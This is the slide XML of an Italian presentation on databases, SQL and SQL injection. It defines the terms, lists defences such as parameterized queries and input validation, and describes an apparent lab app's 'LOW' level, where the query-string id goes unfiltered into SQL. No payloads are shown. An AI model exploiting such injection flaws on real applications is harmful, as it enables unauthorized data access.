            <a:off x="8738431" y="7607099"/>
            <a:ext cx="7842698" cy="824865"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>+123-456-7890  |  @slidemasters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>www.team6SlideMasters.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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623242" y="934217"/>
            <a:ext cx="4778863" cy="945580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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="2254251"/>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3.0 - Sql / </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Sql Injection</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87089" y="8564711"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597472" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-2347101" y="-2471908"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="4700972" y="-2872940"/>
            <a:ext cx="8366046" cy="16553660"/>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6" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3575126" y="460354"/>
            <a:ext cx="10279640" cy="506879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3404"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600" spc="-418">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>3.1 - DEFINIZIONE DI DATABASE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2115472" y="2126209"/>
            <a:ext cx="14276867" cy="6143106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4508"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3220">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Cos’è un Database ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4508"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3948"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Un database è una raccolta organizzata di dati, strutturata in modo tale da poter essere facilmente gestita, accessibile e aggiornata. I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>vengono utilizzati per archiviare informazioni in vari formati, che possono includere testo, numeri, immagini, audio e video.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4228"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3948"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>I database sono gestiti attraverso sistemi di gestione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>database (DBMS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, che forniscono strumenti per la creazione, l'interrogazione, l'aggiornamento e la gestione dei dati. Funzionano tramite query, spesso scritte in linguaggi specifici come SQL per i database relazionali. I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>sono fondamentali per molte applicazioni moderne, dai piccoli programmi aziendali ai grandi sistemi di gestione dei dati utilizzati dalle multinazionali e dai servizi web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13645864" y="184320"/>
            <a:ext cx="724067" cy="868446"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="868446" w="724067">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="724067" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724067" y="868446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8684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6427207" y="2211934"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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2059994" y="-683664"/>
            <a:ext cx="13721492" cy="13721492"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="13721492" w="13721492">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13721492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13721492" y="13721492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13721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6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-636868" y="819926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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3378645" y="2221940"/>
            <a:ext cx="10626204" cy="5331703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4081"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2915">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Cos’è l’SQL ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3521"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3521"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>è l’acronimo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold Italics"/>
              </a:rPr>
              <a:t>Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, ed è un linguaggio pensato e sviluppato per gestire dati all’interno di database relazionali, permettendo di amministrarli in modo efficace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3521"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3521"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2515">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>rende molto efficiente la ricerca e l’ordinamento di grandi quantità di dati quando questi sono strutturati, ma il più grande punto di forza è la possibilità di interrogare i database, attraverso comandi è infatti possibile formulare richieste specifiche e ottenere dati che rispettino i criteri della nostra interrogazione, permettendo poi anche di filtrare ulteriormente i risultati ottenuti o combinarli con quelli di altre richieste.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="380896"/>
            <a:ext cx="14768151" cy="828693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7500" spc="-682">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>3.2 - SQL</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6003485" y="2170706"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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3" id="3"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>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0712509" y="1017503"/>
            <a:ext cx="6184041" cy="8569409"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="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8" id="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9" id="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0" id="1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1" id="1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2" id="1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3" id="1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4" id="1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5" id="1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7" id="1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TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1400972" y="362163"/>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3.3 - SQL INJECTION</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pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8454687" y="4645415"/>
            <a:ext cx="1831325" cy="1217831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="776613" y="2545743"/>
            <a:ext cx="7251576" cy="7115857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4302"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3073">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Cos’è un SQL injection ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4022"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4022"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2873">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Un SQL injection è un tipo di attacco informatico che sfrutta vulnerabilità nelle applicazioni web che interagiscono con un database attraverso query SQL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4022"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4022"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2873">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Questo attacco consente a un malintenzionato di inserire o manipolare comandi SQL all'interno di un input dell'utente (come campi di testo in un modulo web) per eseguire operazioni non autorizzate sul database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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3" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11147555" y="2518438"/>
            <a:ext cx="5313950" cy="6097952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2173">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Protezione contro SQL injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="469186" indent="-234593" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2173">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Parametrizzazione delle query: Utilizzare query parametrizzate o prepared statements che separano il codice SQL dai dati dell'utente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="469186" indent="-234593" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2173">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Convalida degli input: Validare e filtrare i dati dell'utente per assicurarsi che non contengano caratteri pericolosi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2173">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Implementare queste misure di sicurezza è essenziale per proteggere le applicazioni web da attacchi SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3042"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>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Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1362872" y="2575588"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573838" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>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6" id="6"/>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Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8257811" y="2916684"/>
            <a:ext cx="9001489" cy="5861184"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5861184" w="9001489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9001489" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9001489" y="5861185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5861185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1681541" y="82961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3.4 - VERIFICA DELLE VULNERABILITÀ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1498035" y="1682223"/>
            <a:ext cx="5595225" cy="7753469"/>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2" id="1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0" t="-2194" r="0" b="-2194"/>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582126">
            <a:off x="7135071" y="9081053"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7092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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1918392" y="2319392"/>
            <a:ext cx="4754511" cy="6263640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel livello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>LOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, non sono presenti controlli sull'input passato nella query string (id), come illustrato nel seguente codice PHP. In questo caso, l'id viene ottenuto come una semplice stringa di testo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L'input dell'utente non viene filtrato o validato, il che significa che qualsiasi valore passato tramite la query string viene inserito direttamente nella query SQL. Questo rende l'applicazione vulnerabile agli attacchi SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="1216457">
            <a:off x="7138371" y="1697680"/>
            <a:ext cx="2510721" cy="709279"/>
